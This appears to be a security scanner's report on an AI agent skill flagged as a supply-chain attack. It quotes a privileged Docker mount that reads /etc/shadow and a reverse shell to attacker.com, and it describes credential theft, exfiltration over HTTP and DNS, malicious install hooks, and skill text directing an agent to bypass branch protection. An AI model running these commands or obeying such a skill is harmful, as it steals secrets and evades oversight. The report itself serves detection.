The Agent Skills Directory

[COMMAND_EXECUTION]: The skill provides functional templates for executing highly dangerous commands, including Docker container escapes (docker run -v /:/host --privileged alpine cat /host/etc/shadow) and mounting host filesystems to read sensitive system files.
[DATA_EXFILTRATION]: Extensive instructions and code snippets are provided for exfiltrating sensitive data. This includes techniques for sending environment variables, GITHUB_TOKENs, and SSH keys to external servers via HTTP POST requests and DNS exfiltration patterns.
[REMOTE_CODE_EXECUTION]: The skill contains a functional reverse shell payload within the Jenkins Script Console section (['bash', '-c', 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'].execute()). It also teaches how to achieve RCE through malicious dependency hooks like npm 'preinstall' and Python 'setup.py'.
[CREDENTIALS_UNSAFE]: The documentation explicitly guides the agent to locate and extract sensitive credentials, including AWS keys, Kubernetes configs, and private SSH keys from local filesystems and CI/CD environment variables.
[PROMPT_INJECTION]: The skill provides instructions for the agent to generate code that deliberately bypasses security controls, such as branch protection rules and CI/CD secret masking.

supply-chain-attack